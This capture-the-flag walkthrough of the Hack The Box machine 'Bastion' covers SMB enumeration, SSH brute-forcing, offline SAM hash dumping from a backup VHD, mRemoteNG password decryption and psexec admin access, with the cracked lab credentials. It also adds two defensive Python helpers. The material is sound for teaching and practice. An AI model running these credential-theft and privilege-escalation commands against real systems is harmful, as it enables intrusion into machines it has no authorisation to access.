Recon

nmap scans

Default & All ports

sudo nmap -T4 -A -oN nmapA -p- bastion

sudo nmap -sS -sC -A -oN nmapD bastion

The two most intriguing ports are:

  • Port 22 is dedicated to Secure Shell (SSH), ensuring secure remote access and command execution with encrypted communication.
  • Ports 139 and 445 are utilized for NetBIOS Session Service and Server Message Block (SMB) protocol, respectively. They facilitate file and printer sharing in Windows networks, enabling efficient communication between devices.

Ports

22 (SSH)
  • sudo nmap --script=ssh-brute bastion

Using Nmap’s ssh-brute script to brute-force SSH. Unfortunately, it yielded no success.

139/445 (SMB)

  • sudo smbclient -L \\\\bastion\\
  • Attempting to list (with the “-L” option) the shares available on the remote server.

  • sudo smbmap -u 'DoesNotExist' -H bastion
  • “smbmap” talks to the Server Message Block (SMB) service on a host and reports each share’s permissions; a non-existent username checks what a guest/null session can reach. In Windows environments, “READ” and “WRITE” refer to the permissions granted to users or groups for accessing and manipulating files and folders within a shared resource.

Interesting finding:

The presence of a “Backup” directory or share on a system is not a default standard in Windows. It’s more likely that someone created this directory for backup purposes or other specific reasons. System administrators or users often create backup directories to store copies of important data, configurations, or system snapshots.

Learning Center


Mounting Shares

Create a mount point for the “Backups” share, for example “/mnt/smb”.

  • sudo mkdir /mnt/smb

Partitions
  • cd to L4mpje-PC, then ls -la
  • .vhd (Virtual Hard Disk)

7z

7z can list the partitions and files inside a .vhd image without mounting it.

  • sudo 7z l 9b9cfbc3-369e-11e9-a17c-806e6f6e6963.vhd
  • This appears to be a bootable partition.
  • sudo 7z l 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd
  • This is a Windows installation; we can mount this partition.
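Before mounting a backup image it is worth reading its metadata (disk type, size, creation time, checksum). The parser below is an added example, not code from the writeup; the 512-byte footer it parses is constructed inline and is not taken from the Bastion VHDs.

```python
"""Parse the 512-byte footer of a .vhd image to triage a backup before mounting it.
Added example: the footer bytes are constructed here, not read from a real VHD."""
import struct
from datetime import datetime, timedelta, timezone

FOOTER_FMT = ">8sIIQI4sI4sQQHBBII16sB427s"  # big-endian, 18 fields, 512 bytes total
VHD_EPOCH = datetime(2000, 1, 1, tzinfo=timezone.utc)  # VHD timestamps count from here
DISK_TYPES = {2: "fixed", 3: "dynamic", 4: "differencing"}

def vhd_checksum(footer: bytes) -> int:
    """One's complement of the byte sum, with the checksum field (offset 64..67) zeroed."""
    zeroed = footer[:64] + b"\x00\x00\x00\x00" + footer[68:]
    return ~sum(zeroed) & 0xFFFFFFFF

def parse_vhd_footer(footer: bytes) -> dict:
    """Return the fields a forensic triage cares about, plus whether the checksum matches."""
    if len(footer) != 512:
        raise ValueError("VHD footer must be exactly 512 bytes")
    (cookie, _features, _version, _data_off, ts, app, _app_ver, host_os,
     _orig_size, cur_size, _cyl, _heads, _spt, disk_type, checksum, _uid,
     saved_state, _reserved) = struct.unpack(FOOTER_FMT, footer)
    if cookie != b"conectix":
        raise ValueError("not a VHD footer (bad cookie)")
    return {
        "disk_type": DISK_TYPES.get(disk_type, f"unknown({disk_type})"),
        "created_utc": VHD_EPOCH + timedelta(seconds=ts),
        "creator_app": app.decode("ascii", "replace").strip(),
        "host_os": host_os.decode("ascii", "replace").strip(),
        "current_size": cur_size,
        "checksum_ok": checksum == vhd_checksum(footer),
        "saved_state": bool(saved_state),
    }

def build_sample_footer() -> bytes:
    """Constructed fixed-disk footer: 10 MiB, created 2019-02-16 00:00:00 UTC (sample values)."""
    ts = int((datetime(2019, 2, 16, tzinfo=timezone.utc) - VHD_EPOCH).total_seconds())
    size = 10 * 1024 * 1024
    fields = [b"conectix", 0x2, 0x00010000, 0xFFFFFFFFFFFFFFFF, ts, b"win ", 0x000A0000,
              b"Wi2k", size, size, 20, 16, 63, 2, 0, b"\x11" * 16, 0, b"\x00" * 427]
    footer = struct.pack(FOOTER_FMT, *fields)
    fields[14] = vhd_checksum(footer)  # checksum is computed over the footer with that field zeroed
    return struct.pack(FOOTER_FMT, *fields)

if __name__ == "__main__":
    print(parse_vhd_footer(build_sample_footer()))
```

On a real image, read the last 512 bytes of the file and pass them to parse_vhd_footer; a failed checksum or an unexpected creation time is a reason to look closer at the backup before trusting it.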

Mounting .vhd

Let’s create another mount point for the .vhd partition at “/mnt/vhd”. Since the second image is the Windows installation, we’ll only be mounting that one.

sudo guestmount -a 9b9cfbc4-369e-11e9-a17c-806e6f6e6963.vhd -m /dev/sda1 --ro -v -- /mnt/vhd
  • cd Windows/System32/Config
  • cp SAM SYSTEM SECURITY /home/kali/HTB/Windows-Easy/bastion
  • Let’s use secretsdump from the Impacket toolkit
  • impacket-secretsdump -sam SAM -system SYSTEM local
  • This command extracts password hashes and other security-related information from the SAM and SYSTEM registry hives offline (“local”) using Impacket.
  • We’ve got the hashes for Administrator and user L4mpje here. Quick tip: if an NT hash starts with “31d,” it’s likely a blank or null password. On the other hand, L4mpje’s hash seems legit.
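The “31d” tip generalises into a quick hygiene audit of a secretsdump SAM listing (user:rid:lmhash:nthash:::): blank passwords, accounts that still store an LM hash, and accounts sharing one NT hash. This is an added example, not code from the writeup; the sample lines are constructed and use placeholder hashes, not the Bastion hive contents.

```python
"""Audit a secretsdump-style SAM dump for weak credential hygiene.
Added example: SAMPLE_DUMP is constructed; the non-empty hashes are placeholders."""
import re

EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"  # LM hash when LM storage is disabled/empty
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"  # NT hash of the empty password (the "31d" tip)
LINE_RE = re.compile(r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::$")

SAMPLE_DUMP = """\
Impacket v0.10 - Copyright
[*] Dumping local SAM hashes (uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
L4mpje:1000:aad3b435b51404eeaad3b435b51404ee:00000000000000000000000000000000:::
svc_backup:1001:0123456789abcdef0123456789abcdef:00000000000000000000000000000000:::
"""

def audit_sam_dump(dump: str) -> dict:
    """Return accounts with a blank password, accounts that still store an LM hash,
    and groups of accounts whose NT hash is identical (password reuse)."""
    blank, lm_present, by_nt = [], [], {}
    for line in dump.splitlines():
        m = LINE_RE.match(line.strip())
        if not m:
            continue  # banner / status lines carry no hashes
        user, lm, nt = m["user"], m["lm"].lower(), m["nt"].lower()
        if nt == EMPTY_NT:
            blank.append(user)
        if lm != EMPTY_LM:
            lm_present.append(user)
        by_nt.setdefault(nt, []).append(user)
    reused = {h: users for h, users in by_nt.items() if len(users) > 1 and h != EMPTY_NT}
    return {"blank_password": blank, "lm_hash_stored": lm_present, "shared_nt_hash": reused}

if __name__ == "__main__":
    for finding, value in audit_sam_dump(SAMPLE_DUMP).items():
        print(f"{finding}: {value}")
```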
crackstation.net

Let’s copy L4mpje’s hashes and run them through CrackStation. You also have the choice to explore other avenues like Hashcat and John the Ripper.

Foothold

SSH Creds (L4mpje:bureaulampje)

sudo ssh L4mpje@bastion


user flag

L4mpje:bureaulampje

powershell -Command "(Get-Content user.txt).Substring(0,16)"

This extracts a substring that starts at the beginning of the flag (index 0) and includes the first 16 characters.


Privesc

Easy Wins
cmdkey /list

  • “cmdkey /list” lists all the stored credentials (usernames and passwords) saved on the Windows system. These credentials are typically used for accessing network resources such as shared folders, servers, or websites.

reg query HKLM /f password /t REG_SZ /s
  • “reg query HKLM /f password /t REG_SZ /s” searches the HKLM hive of the Windows Registry for any string values whose name or data contains the word “password”.
systeminfo
  • “systeminfo” provides detailed information about the system’s hardware, operating system configuration, and software environment. When executed, it displays a wide range of system-related data, including the computer name, OS version, installed updates, processor information, memory (RAM), network configuration, and more. It’s a handy tool for troubleshooting, system administration, and gaining insights into the system’s specifications and setup.
systeminfo | findstr /B /C:"OS Name" /C:"OS Version" /C:"System Type"
  • This displays only the lines of the “systeminfo” output that begin with the specified strings (“OS Name”, “OS Version”, and “System Type”), so you can retrieve the operating system details without sifting through the entire output.

It appears that we have restrictions, so let’s try running automated tools.

Automated Tools

I attempted to transfer the automated tools “powershell.ps1” and WinPeas to the machine, but it seems that the user is restricted from doing so.

Enumerating

Admin vs Backup Admin Creds

net user Administrator
  • The Administrator password was last set on April 19, 2019.
sudo ls -la /mnt/vhd/Windows/System32/Config/
  • The hives in the backup were last modified on February 16, 2019.
  • This suggests that the “Backup” is an older backup, and the Administrator password has been changed since it was taken. That would explain why the Administrator hash in the backup was a blank password.
Searching for Unusual Software in Windows

  • Searching for unusual software is a good practice because it helps identify potential security risks and unauthorized software installations.
  • C:\ (let’s start at the root directory of the C drive)
  • We’ve identified mRemoteNG, which isn’t typically found in the default Windows C drive.
    • I was previously using PowerShell; now, let me switch to the user L4mpje.
mRemoteNG

Navigate to “C:\Users\L4mpje\AppData\Roaming\mRemoteNG”, as this is the location where the passwords are stored. I will provide the article where I found this.

  • cd C:\Users\L4mpje
dir /a & cd AppData
  • “dir /a” in Windows is the equivalent of “ls -a”. The “ls” command lists directory contents, and the “-a” option (or “/a” in the case of “dir /a”) shows all files, including hidden files and directories, in the specified directory.
  • cd Roaming
  • cd mRemoteNG & save the confCons.xml file to your working dir.
ConfCons.xml

Catting out and analyzing the contents of the confCons.xml file involves searching for the term “password.” During this examination, I identified both a user and a corresponding hash.

  • Password="aEWNFV5uGcjUHF0uS17QTdT9kVqtKCPeoC0Nw5dmaPFjNQ2kt/zO5xDqE4HdVmHAowVRdC7emf7lWWA10dQKiw=="
  • Be aware that the hashes for both L4mpje and Administrator are found here.
mRemoteNG-Decrypt

Root flag

administrator:thXLHM96BeKL0ER2

sudo smbmap -p 445 -H bastion -u administrator -p thXLHM96BeKL0ER2
  • This command is using “smbmap” with elevated privileges to check out a host named “bastion” on port 445. It’s trying to log in as the user “administrator” with the password “thXLHM96BeKL0ER2”. The goal is to explore what’s available on the SMB server
  • If we’re able to read and write to all of the shares, it’s likely because we have administrator privileges. This level of access typically grants us full control over the shared resources on the server.
sudo ssh administrator@bastion

/home/kali/Tools/ImpacketV.0.10/impacket/build/scripts-3.10/psexec.py administrator:'thXLHM96BeKL0ER2'@bastion
  • This command is executing the “psexec.py” script from Impacket. It’s attempting to run the script to execute commands as the administrator user on the target host “bastion” using the provided password “thXLHM96BeKL0ER2”.
flag
